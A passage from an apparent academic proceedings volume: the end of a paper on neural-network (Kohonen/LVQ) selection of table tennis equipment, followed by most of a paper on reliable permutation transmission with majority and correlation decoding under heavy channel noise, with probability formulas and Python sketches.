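            step = lr * (X[i] - W[k])
            W[k] += step if Wy[k] == y[i] else -step
    return W, Wy

def classify(W, Wy, X):
    """Assign each row of X the label of its nearest prototype."""
    X = np.asarray(X, dtype=float)
    d = ((X[:, None, :] - W[None, :, :]) ** 2).sum(axis=-1)
    return Wy[np.argmin(d, axis=1)]
```

As in the MatLab workflow, classification of the whole information bank then reduces to a single forward pass (classify), with class 1 marking the equipment of interest.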
4 Experiments

To check the effectiveness of the developed method, we consider real data on table tennis equipment. Let us make a selection from the general set of table tennis blades [2, 3]; the number of elements in it is 50. Among all factors, we choose the following: X1 is the blade thickness, X2 is speed, X3 is control, X4 is the number of layers, X5 is weight, and Z is a complex parameter that takes into account speed, rotation, and control. In order to find non-significant factors, we run the Kohonen network training
algorithm four times for the numbers of clusters K1 = 3, K2 = 4, K3 = 5, K4 = 6. Each table tennis blade is assigned to a specific class. In the next step, the elements of the correlation matrix are found (Table 1). Having set the constant C equal to 0.4 and calculating the sums of absolute values (10) over the columns of the matrix, we make sure that the corresponding values for the factors X1, X2, X3, X5, and Z are greater than C, while the value for X4 is not. This indicates that the number of layers X4 is an insignificant factor and can be removed from the database.

Table 1. Correlation coefficients
      X1       X2       X3        X4        X5       Z
K1    0.6832   0.5507   0.6338    0.0270    0.3908   0.5910
K2    0.4761   0.4473   0.5033   –0.0872    0.3745   0.4381
K3    0.7325   0.7265   0.7304   –0.1120    0.4274   0.5592
K4    0.7080   0.6851   0.6734   –0.1535    0.3987   0.5897
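The factor-significance computation of Eqs. (9)-(10) can be reproduced directly from Table 1. The following Python sketch (an illustration, not the authors' code) sums the absolute correlation coefficients over the K rows for each factor; the clear gap between the sum for X4 and the sums for the other factors is what drives its removal.

```python
import numpy as np

# Correlation coefficients of Table 1: rows K1..K4, columns X1, X2, X3, X4, X5, Z
R = np.array([
    [0.6832, 0.5507, 0.6338,  0.0270, 0.3908, 0.5910],
    [0.4761, 0.4473, 0.5033, -0.0872, 0.3745, 0.4381],
    [0.7325, 0.7265, 0.7304, -0.1120, 0.4274, 0.5592],
    [0.7080, 0.6851, 0.6734, -0.1535, 0.3987, 0.5897],
])
S = np.abs(R).sum(axis=0)  # column sums of |r_ij|, Eq. (10)
for name, s in zip(["X1", "X2", "X3", "X4", "X5", "Z"], S):
    print(f"S({name}) = {s:.4f}")
# S(X4) is about 0.38 while every other sum exceeds 1.5, so any threshold C
# between these two groups flags X4 (number of layers) as insignificant.
```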
5 Results

The result of the research is the development of the NeuroTT information and analytical system. The structure of the NeuroTT system, its modular composition, and the features of its operation are discussed in [20]. The main purpose of the system is to provide advisory services to customers (players) by analyzing statistical information. Working with the information-analytical system has certain features (Fig. 4). The science-intensive nature of the transformations carried out by the system is smoothed out by a friendly user interface. While the operator's input of inventory information does not differ from ordinary work with database tables, the client's work requires some adaptation to the formalized presentation of information. Given that the same software modules are used to solve the problems of analysis and selection of table tennis equipment, they form the core of the system. As the NeuroTT system is open to changes and additions, it can be modified in each case according to individual tasks. The integration of kernel library functions and additional module functions is carried out from user interface applications; the functions of these levels can interact only through the data bank.
Fig. 4. Technology of interaction with NeuroTT system
6 Discussion

Summarizing the above, we note that the self-organization of an information bank makes it possible to optimize powerful databases in an environment of great informational diversity. These algorithms make it possible to choose the right equipment according to certain criteria even faster. One of the main functions of the NeuroTT system is the selection of the necessary equipment. Once the required dependencies are identified, one can pose queries of the form "and if A, then what…?". Anticipating possible scenarios for the development of the table tennis market simplifies decision-making processes and increases their reliability. As a result of the study, we have managed to reduce the information entropy of the factors and the presence of noise effects. A method for self-organization of the information bank based on the result of solving the clustering problem, obtained using the Kohonen self-organizing network, has been developed. According to our estimates, the practical use of the developed method gives an acceleration of 20% when executing the corresponding queries. The proposed method is a continuation of work on solving problems of analysis of complex systems, of which the table tennis market is an example. The method successfully uses and continues the ideas presented in [6]. Comparing the proposed method with existing similar ones [7], we can say that the proposed method is less demanding on the input data. This is explained by the very nature of neural networks [9]. The artificial neural network makes the modeling invariant to the variety of factors and the high power of their value sets.
Investigating the table tennis market, we note a significant uncertainty associated with the variety of factors, which are deterministic, probabilistic-statistical, and subjective. Their composition is important for solving the problems of analysis and selection of table tennis equipment. At the same time, the task of formalizing the factors and reducing them to a form suitable for calculations is complex and ambiguous, because deterministic factors have either numerical values or values reducible to them; probabilistic-statistical factors are characterized by values and their probabilities; and the determination of subjective factors requires expert support and the application of fuzzy set theory methods. Adequate analysis of the table tennis market is possible under the condition of creating and using automated systems with the proposed method of self-organization. The results of such automated systems will reduce the entropy in the initial data and will serve as a means of supporting decision-making in the selection of table tennis equipment and in analyzing its dependence on external and internal factors. Future work will focus on the creation of an online automated NeuroTT system, which will make it possible to select table tennis equipment using the proposed method.
7 Conclusions

The scientific novelty of the obtained results is that, for the first time, models for analyzing the table tennis equipment market based on the principles of self-organization and the paradigms of biocybernetics are proposed, and, for the first time, a neural network method of information bank self-organization, the core of which is the results of solving the clustering problem, is developed. The proposed method of extracting insignificant factors on the basis of neural network technologies is another option for optimizing powerful databases. Its advantage is that the neural network, without the mediation of an expert, determines what information can be extracted without increasing entropy and which factors are secondary when choosing table tennis equipment. The number of calculations is significantly reduced when determining database records that meet customer requirements. Traditionally, this required checking all records for each field against a certain criterion. With the new method, it is enough to train the neural network to classify equipment on reference images, and then use it in direct mode to determine the class membership of all objects contained in the database. Thus, formalized formulations of tasks for analyzing the table tennis market are given, which include: identification of a parameter that takes into account speed, rotation, and control, and determination of sensitivity coefficients for the change of the parameter that determines the playing properties of the bat with respect to changes in exogenous factors. Neural network models and methods of self-organization of the information bank are offered. The need for their use is caused by information redundancy and noise effects. Based on the repeated use of the Kohonen network to solve the clustering problem, a method of extracting insignificant factors from the data bank has been developed. The proposed method gives an acceleration of 20%.
References
1. Rubber Reviews. https://revspin.net/rubber/
2. Blade Reviews. https://revspin.net/blade/
3. The Database of Table Tennis Blades Compositions. https://stervinou.net/ttbdb/index.php/
4. Landyk, V.I.: Sports Training Methodology: Table Tennis. NordPress, Donetsk (2005)
5. Tazetdinov, V.A.: Automation of the process of selection of equipment for table tennis using neural network systems. Komputerno-Integrovani Tekhnologii: Osvita, Nauka, Vyrobnyztvo: Sci. J. 32, 81–84 (2018)
6. Hertz, J.A.: Introduction to the Theory of Neural Computation. CRC Press (2018)
7. Suzuki, H., Suguru, A.: Self-organization of associative database and its applications. Neural Information Processing Systems (1987)
8. Hlybovets, M.M., Oletsky, O.V.: Artificial Intelligence. Academiya, Kyiv (2002)
9. Jahnavi, M.: Introduction to Neural Networks, Advantages and Applications. Towards Data Science (2017). https://towardsdatascience.com/introduction-to-neural-networks-advantages-and-applications-96851bd1a207
10. Ahalya, G., Pandey, H.M.: Data clustering approaches survey and analysis. In: International Conference on Futuristic Trends on Computational Analysis and Knowledge Management (ABLAZE), pp. 532–537. IEEE (2015)
11. Li, H., Zhang, Z., Liu, Z.: Application of artificial neural networks for catalysis: a review. Catalysts 7(10), 306 (2017)
12. Kutakh, O.P.: Research of dynamic situations and determination of their characteristics at different stages of the decision-making process. Systemni Doslidzhennya ta Informatsiyni Tekhnolohiyi 4, 60–72 (2003)
13. Behler, J., Parrinello, M.: Generalized neural-network representation of high-dimensional potential-energy surfaces. Phys. Rev. Lett. 98(14), 146401 (2007)
14. Li, J., Mei, X., Prokhorov, D., Tao, D.: Deep neural network for structural prediction and lane detection in traffic scene. IEEE Trans. Neural Netw. Learn. Syst. 28(3), 690–703 (2017)
15. Turner, A.P., Caves, L.S., Stepney, S., Tyrrell, A.M., Lones, M.A.: Artificial epigenetic networks: automatic decomposition of dynamical control tasks using topological self-modification. IEEE Trans. Neural Netw. Learn. Syst. 28(1), 218–230 (2017)
16. Qiu, M., Song, Y., Akagi, F.: Application of artificial neural network for the prediction of stock market returns: the case of the Japanese stock market. Chaos Solit. Fractals 85, 1–7 (2016)
17. Göçken, M., Özçalıcı, M., Boru, A., Dosdoğru, A.T.: Integrating metaheuristics and artificial neural networks for improved stock price prediction. Expert Syst. Appl. 44, 320–331 (2016)
18. Rumelhart, D.E., Hinton, G.E., Williams, R.J.: Learning representations by back-propagating errors. Nature 323, 533–536 (1986)
19. Fox, G.C., Koller, J.G.: Code generation by a generalized neural network: general principles and elementary examples. J. Parallel Distrib. Comput. (1989). https://doi.org/10.1016/0743-7315(89)90066-X
20. Tazetdinov, V.A., Sysoienko, S.V.: Neural network system for selection of table tennis equipment. Visnyk Cherkaskogo Derzhavnogo Tekhnolohichnogo Universytetu 1, 79–85 (2021). https://doi.org/10.24025/2306-4412.1.2021.225999
Information and Communication Systems and Networks
A Method for Reliable Permutation Transmission in Short-Packet Communication Systems

Emil Faure1,2(B), Anatoly Shcherba1, Bohdan Stupka1, Iryna Voronenko3, and Alimzhan Baikenov4

1 Cherkasy State Technological University, Cherkasy, Ukraine
[email protected]
2 State Scientific and Research Institute of Cybersecurity Technologies and Information Protection, Kyiv, Ukraine
3 National University of Life and Environmental Sciences of Ukraine, Kyiv, Ukraine
4 Almaty University of Power Engineering and Telecommunications named after Gumarbek Daukeyev, Almaty, Kazakhstan
Abstract. The paper describes the research, development, and implementation of a method for permutation transmission over communication channels with a bit error probability close to 0.5. The developed method can be used for communication systems with non-separable factorial coding, in particular, to implement a three-pass cryptographic protocol based on permutations. The method uses circular shifts of the carrier permutation to represent each transmitted permutation symbol. The carrier permutation has the maximum value of the minimum Hamming distance from the binary representation of permutation to all its circular shifts. The majority and correlation processing of the fragments received from the communication channel makes it possible to implement a reliable permutation transmission under high-intensity channel noise. A mathematical model for permutation transmitting has been developed. Analytical expressions for calculating the probability of a permutation being received correctly and incorrectly are presented. An algorithm that applies the proposed method has been developed and implemented. The results of the constructed simulation software model of the data transmission system confirm the effectiveness of the developed method in comparison with the traditional DSSS method for the bit error probability equal to 0.495. Keywords: permutation · factorial coding · noise · three-pass cryptographic protocol · short-packet communications
1 Introduction

Dependability [1] is considered to be one of the main features characterizing modern information systems and networks. Several information security tasks are being solved synchronously when transmitting information in multi-purpose communication
and control systems. Such tasks include ensuring confidentiality, integrity, and availability, called CIA [2, 3], or confidentiality, availability, controllability, and authentication, called CACA [4]. Solving the above-mentioned tasks separately is associated with applying various mathematical methods and algorithms, as well as sequential processing of information. This leads to an increasing load on the information conversion channels, growing requirements for their speed, an increase in the introduced redundancy and, as a result, a decrease in the relative transmission rate. The methodology of integrated information security based on non-separable factorial data coding [5] enables using permutations as a transport mechanism in short-packet communication systems [6–8], as well as implementing joint protection of transmitted data from communication channel errors and unauthorized access. Several attempts [9, 10] have been made to investigate the ability of a non-separable factorial code to detect and correct communication channel errors. The efficiency of the code has been proven. It is achieved, among other factors, due to the code synchronization properties [11, 12]. Along with the above, the considered properties do not enable using non-separable factorial coding in data transmission systems with high noise and a bit error probability close to 0.5. In addition, some applications [6, 13–16] require higher reliability scores. Such applications include protocols for data transmission under conditions of high noise (low SNR) [17, 18], as well as three-pass cryptographic protocols [19–22], in particular, a three-pass cryptographic protocol based on permutations [23]. In three-pass protocols, the data is transmitted three times to communicate one message, which increases the probability of the data being affected by channel noise. The error detection property of non-separable factorial coding can be improved by introducing additional redundancy. The use of existing error-correcting codes [24–27] for this purpose can have a positive effect. However, the use of such codes is limited when the bit error probability is close to 0.5. In such cases, it is worth considering that the non-separable factorial code is redundant and detects errors by its nature [9]. The aim of this study is to provide a reliable transmission of permutations that is resistant to the impact of high-level noise resulting in a bit error probability close to 0.5. This study uses circular shifts of the carrier permutation to represent each transmitted permutation symbol. The carrier permutation has the maximum value of the minimum Hamming distance from the binary representation of permutation to all its circular shifts. Furthermore, a majority and correlation processing of data fragments received from the communication channel has been introduced to recognize permutation. To evaluate the developed method for reliable permutation transmission, a Python software model has been constructed. This paper is organized as follows. Section 2 provides the basic concepts for transmitter data structure, permutation recognition, theoretical assessment of probabilistic indicators, and details an outline of the method for error-correcting permutation transmission. Section 3 presents a case study for implementing the method for reliable permutation transmission. Section 4 gives the results of the method evaluation through simulation. Section 5 discusses the results and compares them with DSSS system indicators.
Section 6 summarizes the findings and concludes the paper.
2 Materials and Methods

The study [9] shows that the codewords of a non-separable factorial code belong to a subset within the set of permutations {π} of length M. Permutation symbols are encoded by a fixed-length binary code with a codeword length $l_r = \lceil \log_2 M \rceil$. Here, we explain the principle for constructing a reliable data transmission system using the example of a permutation π of length M = 8, i.e., a sequence of decimal characters of the set {0, 1, 2, 3, 4, 5, 6, 7}. Each character in this set is encoded with $l_r = \lceil \log_2 M \rceil = 3$ bits, for instance, as Table 1 shows. Then the length of each permutation represented in binary notation is equal to $n = M \cdot l_r = 24$ bits.

Table 1. Permutation character encoding scheme
Decimal notation   0     1     2     3     4     5     6     7
Binary notation    000   001   010   011   100   101   110   111
Let $\pi_i(j)$ denote the circular shift of the permutation $\pi_i$ to the left by j bits, and let $d_{ij}$ denote the Hamming distance from the permutation $\pi_i$ to its circular shift $\pi_i(j)$, where $0 \le i \le M! - 1$, $1 \le j \le n - 1$. At the same time, $d_i = \min_j d_{ij}$ and $d = \max_i (d_i) = \max_i \min_j d_{ij}$.
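As an illustration (not part of the paper's tooling), the following pure-Python sketch evaluates the distances $d_{ij}$ for the binary representation of a candidate permutation, using the 3-bit symbol encoding of Table 1; it is applied here to the carrier permutation of the model example introduced below.

```python
def to_bits(perm):
    """24-bit string for a permutation of length M = 8, 3 bits per symbol."""
    return "".join(f"{s:03b}" for s in perm)

def circular_distances(perm):
    """Hamming distances d_ij from the permutation to all its circular shifts."""
    b = to_bits(perm)
    n = len(b)
    return [sum(x != y for x, y in zip(b, b[j:] + b[:j])) for j in range(1, n)]

dists = circular_distances([0, 1, 7, 3, 2, 5, 4, 6])
print(min(dists))  # 12: the minimum distance d_i for this carrier permutation
```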
Definition 1. A letter $L_j$ is a circular shift $\pi_i(j)$ of a permutation $\pi_i$ whose Hamming distances to all its circular shifts are not less than d: $\forall d_{ij} \ge d$.

Remark 1. In the model example chosen for the study, we use the permutation $\pi_i$ = {0,1,7,3,2,5,4,6} = {000,001,111,011,010,101,100,110} to generate the letters $L_j$. We have obtained this permutation from [12].

Definition 2. A word W is a permutation of letters $L_j$.

Remark 2. Either all or some of the letters $L_j$ may be used to form the word W. The number of letters in the word determines its length, which will be denoted by N, N ≤ n. The Hamming distance between $L_0$ and $L_j$ will be denoted by $d_j$.

Remark 3. For the model example used in this study, the permutation length M = 8, and the word W is generated from 23 letters $L_j$, where 1 ≤ j ≤ 23.

2.1 Word Recognition

In this study, we apply the majority and correlation processing [12] of the received data to enhance its reliability. The majority processing method involves multiple repetitions of the word and accumulation of its reception results. The accumulation factor
l = 3, 5, 7, … is equal to the number of repeated words. The receiver accumulates data fragments; the length of each fragment is equal to the length of the word. Based on l received fragments, a sequence R is obtained, consisting of N sequences $R_j$, where $j \in [1, N]$. The length of each sequence $R_j$ is equal to the letter length. Each bit of the sequence R is calculated from the corresponding bits of the received fragments: if the i-th bits of the fragments contain more binary 'ones', the i-th bit of the sequence R takes the value 'one'; in the opposite case it takes the value 'zero'. The correlation processing involves calculating the Hamming distances from each sequence $R_j$, where $j \in [1, N]$, to all letters used by the transmitter. If this distance does not exceed the value $d_{\lim} = \lfloor (d - 1)/2 \rfloor$ for one of the letters, this letter corresponds to the sequence $R_j$. For the model example, the Hamming distances between the permutation $\pi_i$ = {0,1,7,3,2,5,4,6} and its bit circular shifts are at least d = 12, whence $d_{\lim} = 5$. If different source letters correspond to the different sequences $R_j$, where $j \in [1, N]$, then the received word is a permutation of these letters. If this permutation is used by the source, the word is issued to the consumer.

2.2 Probability of Correct and Incorrect Word Recognition

The bit error probability in the refined sequence R following majority processing of l fragments received from the communication channel with the bit error probability $p_0$ is equal to

$p_0^* = \sum_{i=(l+1)/2}^{l} C_l^i \, p_0^i (1 - p_0)^{l-i}.$  (1)
In cases when l ≥ 1,027, it would be expedient to use the approximation formula from [12] to determine $p_0^*$. The probability of correct letter recognition is determined by the probability of at most $d_{\lim}$ errors in the refined sequence R:

$P_{L\_true} = \sum_{\nu=0}^{d_{\lim}} C_n^{\nu} (p_0^*)^{\nu} (1 - p_0^*)^{n-\nu}.$  (2)
A correct recognition of a word of length N is only possible when all N letters are recognized correctly. The probability of this event is

$P_{W\_true} = P_{L\_true}^{N}.$  (3)
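A small Python script illustrating Eqs. (1)-(3) for the model example (n = 24, $d_{\lim}$ = 5, N = 23); floating-point evaluation is adequate for moderate accumulation factors. It is an independent illustration, not the paper's simulation model.

```python
from math import comb

def p0_star(p0, l):
    """Eq. (1): residual bit error probability after an l-fold majority vote."""
    return sum(comb(l, i) * p0**i * (1 - p0)**(l - i)
               for i in range((l + 1) // 2, l + 1))

def p_letter_true(p0, l, n=24, d_lim=5):
    """Eq. (2): at most d_lim residual errors in the refined sequence R."""
    p = p0_star(p0, l)
    return sum(comb(n, v) * p**v * (1 - p)**(n - v) for v in range(d_lim + 1))

def p_word_true(p0, l, N=23):
    """Eq. (3): all N letters of the word are recognized correctly."""
    return p_letter_true(p0, l) ** N

print(p_word_true(0.3, 21))  # >= 0.999, matching the discussion below
```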
Graphs of $P_{W\_true}(l)$ for this paper's model example with $\pi_i$ = {0,1,7,3,2,5,4,6} and N = 23 at varying values of $p_0$ are presented in Fig. 1. As the dependences shown in Fig. 1 indicate, the accumulation factor can vary over a wide range to achieve a given probability of correct word reception. Thus, to achieve $P_{W\_true} \ge 0.999$ when $p_0 = 0.1$, an accumulation factor l = 3 is required; $p_0 = 0.3$ requires l = 21; $p_0 = 0.45$ requires l = 363; and $p_0 = 0.495$ requires l = 36,413. Therefore, the approach to processing the received data proposed in this paper provides for accumulating n-bit fragments received from the communication channel,
majority processing of the fragments, and processing of letters and words. The maximum value of the accumulation factor l is determined by the maximum bit error probability the data transmission system is designed for, as well as by the specified minimum probability of correct word recognition. When creating a data transmission system, it is also necessary to consider the probability of an undetected error occurring in the received word. Here, we determine this probability.
Fig. 1. Probability of a word being received correctly, depending on the number of accumulated fragments, for different bit error probabilities: (a) p0 ≤ 0.45; (b) p0 ≥ 0.47
Theorem 1. The probability for a letter to be recognized incorrectly is

$P_{L\_false} = \sum_{j=1}^{N-1} \left( LW_j \cdot \sum_{v=d_j-d_{\lim}}^{d_j} C_{d_j}^{v} \sum_{w=0}^{v-d_j+d_{\lim}} C_{n-d_j}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{n-(w+v)} \right),$  (4)
where $LW_j$ is the coefficient indicating that the letter $L_j$ belongs to the subset of letters used to form words: if $L_j$ is used to form a word then $LW_j = 1$; in the opposite case $LW_j = 0$.

Proof. To prove this theorem, we have chosen the approach applied in Theorem 3 in [12]. The probability that an error leading to incorrect letter reception occurs in the refined sequence R is equal to the probability that any of the error vectors occurring in the refined sequence R converts the letter into any of the remaining N − 1 letters with an accuracy of $d_{\lim}$ bits. Recall that $d_j$ is the Hamming distance from letter $L_0$ to letter $L_j$, the circular shift of $L_0$ by j bits. Then an error converts the letter $L_0$ into its circular shift $L_j$ if it contains ν errors in the $d_j$ bits where these sequences differ, whence $d_j - d_{\lim} \le \nu \le d_j$. Moreover, in the remaining $n - d_j$ bits, additional w bit errors are possible, where $0 \le w \le \nu - (d_j - d_{\lim})$. The probability of the event therefore constitutes:
$P_{L\_false} = \sum_{j=1}^{N-1} \left( LW_j \cdot \sum_{v=d_j-d_{\lim}}^{d_j} \left( C_{d_j}^{v} (p_0^*)^{v} (1 - p_0^*)^{d_j - v} \sum_{w=0}^{v-d_j+d_{\lim}} C_{n-d_j}^{w} (p_0^*)^{w} (1 - p_0^*)^{n-d_j-w} \right) \right).$  (5)
By grouping the factors in (5), we obtain the formula (4) for the probability of a letter being recognized incorrectly.

Remark 4. As demonstrated in [12], for the permutation $\pi_i$ = {000,001,111,011,010,101,100,110} with $d_{\lim} = 5$, the values $d_{ij} = 12$ occur in 19 cases, the values $d_{ij} = 14$ occur in two cases, and the values $d_{ij} = 16$ occur in two cases. Thus, in the case of using all 24 circular shifts of the indicated permutation to form a word, Eq. (4) takes the following form:

$P_{L\_false} = 19 \sum_{v=7}^{12} C_{12}^{v} \sum_{w=0}^{v-7} C_{12}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w} + 2 \sum_{v=9}^{14} C_{14}^{v} \sum_{w=0}^{v-9} C_{10}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w} + 2 \sum_{v=11}^{16} C_{16}^{v} \sum_{w=0}^{v-11} C_{8}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w}.$  (6)
In the case of using 23 circular shifts of the permutation $\pi_i$ = {000,001,111,011,010,101,100,110} to form a word, the upper bound for the probability of incorrect letter recognition can be estimated as follows:

$P_{L\_false} \le 19 \sum_{v=7}^{12} C_{12}^{v} \sum_{w=0}^{v-7} C_{12}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w} + 2 \sum_{v=9}^{14} C_{14}^{v} \sum_{w=0}^{v-9} C_{10}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w} + \sum_{v=11}^{16} C_{16}^{v} \sum_{w=0}^{v-11} C_{8}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w}.$  (7)

In the case of using N, where $2 \le N \le n$, circular shifts of the permutation $\pi_i$ = {000,001,111,011,010,101,100,110}, the upper bound for the probability of incorrect letter recognition can be estimated as follows:

$P_{L\_false} \le (N - 1) \sum_{v=7}^{12} C_{12}^{v} \sum_{w=0}^{v-7} C_{12}^{w} (p_0^*)^{v+w} (1 - p_0^*)^{24-v-w}.$  (8)
Remark 5. In this study's model example, formula (7) was used when performing numerical calculations to determine the probability of a letter being recognized incorrectly.

Theorem 2. The probability for a word to be received incorrectly is

$P_{W\_false} = \sum_{j=2}^{N} C_N^{j} \left( \frac{P_{L\_false}}{N-1} \right)^{j} \cdot\ !j \cdot P_{L\_true}^{N-j},$  (9)

where $!j = j! \sum_{k=0}^{j} \frac{(-1)^k}{k!}$ is the subfactorial of j.
Proof. The probability of an error occurring in a word and leading to its incorrect reception is equal to the probability of permuting two or more letters in the word, with the remaining letters recognized without errors. In this case, the probability of a word being received incorrectly is

$P_{W\_false} = \sum_{j=2}^{N} C_N^{j} P_{der\_j} P_{L\_true}^{N-j},$  (10)

where $P_{der\_j}$ is the probability of an error resulting in a permutation of j letters without fixed points (the probability of a derangement of j letters). This probability is defined as follows. The probability of transforming a letter into a certain other letter belonging to the subset of letters constituting the word is $P_{L\_false}/(N-1)$. The number of derangements of length j is equal to the subfactorial !j. Then the probability of a derangement occurring in j letters is equal to $\left(P_{L\_false}/(N-1)\right)^{j} \cdot\ !j$. By substituting this expression into (10), we obtain the formula (9) for the probability of a word being recognized incorrectly.
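For numerical work, the bound (8) and the word-level formula (9) translate directly into code. The sketch below is illustrative only and assumes the model example values (n = 24, N = 23) and the dominant $d_j = 12$ case of Eq. (8); the subfactorial is computed exactly via the standard recurrence rather than the floating-point sum.

```python
from math import comb

def subfactorial(j):
    """Number of derangements: !j = j * !(j-1) + (-1)**j, with !0 = 1."""
    d = 1
    for i in range(1, j + 1):
        d = i * d + (-1) ** i
    return d

def p_letter_false_bound(ps, N=23, n=24):
    """Eq. (8): upper bound on the letter-error probability (d_j = 12 terms)."""
    return (N - 1) * sum(
        comb(12, v) * sum(comb(n - 12, w) * ps**(v + w) * (1 - ps)**(n - v - w)
                          for w in range(v - 7 + 1))
        for v in range(7, 13))

def p_word_false(pl_false, pl_true, N=23):
    """Eq. (9): derangement-based probability of undetected word error."""
    return sum(comb(N, j) * (pl_false / (N - 1))**j * subfactorial(j)
               * pl_true**(N - j) for j in range(2, N + 1))
```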
By substituting the upper bound on $P_{L\_false}$ from (7) into (9), we obtain the upper bound on $P_{W\_false}$ for the study example. Figure 2 shows graphs of the estimates $P_{W\_false}(l)$ for the model example with $\pi_i$ = {0,1,7,3,2,5,4,6} and N = 23 for various values of $p_0$.
Fig. 2. Probability of a word being received incorrectly, depending on the number of accumulated fragments, for different bit error probabilities: (a) p0 ≤ 0.45; (b) p0 ≥ 0.47
Note that all graphs in Fig. 2 contain maximum points. These points correspond to different values of the accumulation factor l. The maximum values of $P_{W\_false}(l)$ for $p_0 \le 0.495$ are shown in Table 2.
Table 2. Maximum values of $P_{W\_false}(l)$

p0       max PW_false(l)
0.1      2.53101 · 10−8
0.2      3.44773 · 10−8
0.3      1.03869 · 10−7
0.4      1.24529 · 10−7
0.43     1.26329 · 10−7
0.45     1.26568 · 10−7
0.47     1.26569 · 10−7
0.475    1.26577 · 10−7
0.48     1.26578 · 10−7
0.495    1.26580 · 10−7
Remark 6. For the model example, $P_{W\_false}(l) \le 1.26580 \cdot 10^{-7}$ for ∀l at ∀$p_0 \le 0.495$.

Remark 7. Equations (3) and (9) determine the probabilities of correct and incorrect word reception for a separate experiment with a fixed value of the accumulation factor l. These expressions do not take into account the procedure of successively increasing l.
2.3 Estimating Total Interval Probabilities of a Word Being Received Correctly or Incorrectly

In this part of the study, we assess the total interval probabilities of correct, $P_{W\_true\_final}(l)$, and incorrect, $P_{W\_false\_final}(l)$, word reception over ∀i ≤ l fragments. Here, we assume that the event A(i) = {the receiver has recognized the word for none of the j < i accumulated fragments}; in other words, the event A(i) means that i fragments have been accumulated by the receiver. Let B(i) be the event of correct word reception by i fragments, and C(i) be the event of incorrect word reception by i fragments. In addition, with a successive increase in the number of accumulated fragments, we denote the event of a word being received correctly by ∀i ≤ l fragments by D(l), and the event of a word being received incorrectly by ∀i ≤ l fragments by E(l). The event D(l) represents the union of all correct word recognition events over i ≤ l fragments:

$D(l) = \bigcup_{i \le l} B(i).$  (11)

The probability of the event D(l) is

$P(D(l)) = P\left( \bigcup_{i \le l} B(i) \right).$  (12)

Note that $P(D(l)) = P\left( \bigcup_{i \le l} B(i) \right) \ge P(B(i))$ for ∀i ≤ l. According to Fig. 1, P(B(i)) is monotonically increasing in i; it is therefore advisable to choose the maximum value of P(B(i)), i ≤ l, for a more accurate lower bound on P(D(l)). This value is P(B(l)). Considering that $P(D(l)) = P_{W\_true\_final}(l)$ and $P(B(i)) = P_{W\_true}(i)$, the following estimate is obtained:

$P_{W\_true\_final}(l) \ge P_{W\_true}(l).$  (13)
The event E(l) is a disjoint union of all incorrect word reception events by i ≤ l fragments, multiplied by the events of accumulating i fragments by the receiver:

$E(l) = \bigcup_{i \le l} C(i) \cdot A(i).$  (14)

The probability of the event E(l) is

$P(E(l)) = P\left( \bigcup_{i \le l} C(i) \cdot A(i) \right).$  (15)

Since the events $C(i) \cdot A(i)$ in Eq. (14) are incompatible, we obtain

$P(E(l)) = P\left( \bigcup_{i \le l} C(i) \cdot A(i) \right) = \sum_{i \le l} P(C(i) \cdot A(i)).$  (16)
Since $P(C(i) \cdot A(i)) \le P(C(i))$ for ∀i ≤ l, whereas $P(E(l)) = P_{W\_false\_final}(l)$ and $P(C(i)) = P_{W\_false}(i)$, the following estimate is obtained:

$P_{W\_false\_final}(l) \le \sum_{i \le l} P_{W\_false}(i).$  (17)
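In code, the interval bound (17) is simply a running sum of the single-shot values over the accumulation factors actually tried; a minimal sketch, assuming odd factors starting at 3 (as in l = 3, 5, 7, …) and a callable for $P_{W\_false}(i)$:

```python
def p_word_false_final_bound(p_word_false, l):
    """Eq. (17): cumulative upper bound over accumulation factors i = 3, 5, ..., l."""
    return sum(p_word_false(i) for i in range(3, l + 1, 2))
```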
For the study's model example, Fig. 3 presents the graphs reflecting the dependencies of the estimates (13) and (17) for the probability of a word being received correctly and the probability of a word being received incorrectly (the probability of an undetected error) on the number of accumulated fragments l. Having defined the approach to recognizing a word, the next section addresses the proposed method for reliable transmission of permutation words.
Fig. 3. Probability of a word being received correctly or incorrectly, depending on the number of accumulated fragments
2.4 Method for Error-Correcting Permutation Transmission

The method includes the following stages:

1. The transmitter sequentially outputs a permutation W of length N, called the word. Each permutation symbol $L_j$, where 1 ≤ j ≤ N, called the letter, is a circular shift of a permutation π of length M. The permutation π must have the maximum value of the minimum Hamming distance from its n-bit representation to all of its circular shifts (e.g., for M = 8, π = (000,001,111,011,010,101,100,110) [12]). Obviously, the number of circular shifts of the permutation π must not be less than the length N of the word W: n ≥ N. The data transmission procedure should be preceded by a procedure for synchronizing by letters, for example, as proposed in [11, 12].
2. For each letter, the receiver accumulates l fragments of n bits received from the communication channel.
3. For each letter, the refined sequences $R_j$, where $j \in [1, N]$, are independently calculated. Each bit of such a sequence is calculated by the majority principle from the corresponding bits of the received fragments: if the i-th bits of the fragments contain more 'ones', the i-th bit of the refined sequence is assigned the value 'one'; in the opposite case it is given the value 'zero'.
4. For each refined sequence $R_j$, where $j \in [1, N]$, the Hamming distances to the letters used by the source are calculated. If this distance does not exceed the value $d_{\lim} = \lfloor (d - 1)/2 \rfloor$ for one of the letters, this letter corresponds to the j-th letter of the word W.
5. If all sequences $R_j$, where $j \in [1, N]$, correspond to different letters used by the source, that is, the received word represents a permutation of these letters, and this permutation is used by the source, the word is issued to the consumer. Otherwise, all word recognition operations are repeated, starting from stage 2 of this list.
6. The number of accumulated fragments can be sequentially increased up to a certain predetermined threshold $l_{max}$. If the word is not recognized on reaching the threshold, the reception procedure is terminated, and the signal "Channel failure" is output.
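A minimal Python sketch of the receiver-side stages 2-5 follows. The paper's own model is also written in Python, but the code below is an independent illustration with assumed data layouts: fragments arrive as lists of 0/1 values, and letters is the list of n-bit circular shifts used by the source.

```python
def majority(fragments):
    """Stage 3: bitwise majority vote over l accumulated n-bit fragments."""
    return [1 if 2 * sum(col) > len(fragments) else 0 for col in zip(*fragments)]

def hamming(a, b):
    return sum(x != y for x, y in zip(a, b))

def recognize_word(frag_sets, letters, d_lim=5):
    """Stages 3-5: frag_sets[j] holds the fragments for letter position j.
    Returns decoded letter indices, or None (accumulate more fragments)."""
    decoded = []
    for fragments in frag_sets:
        r = majority(fragments)
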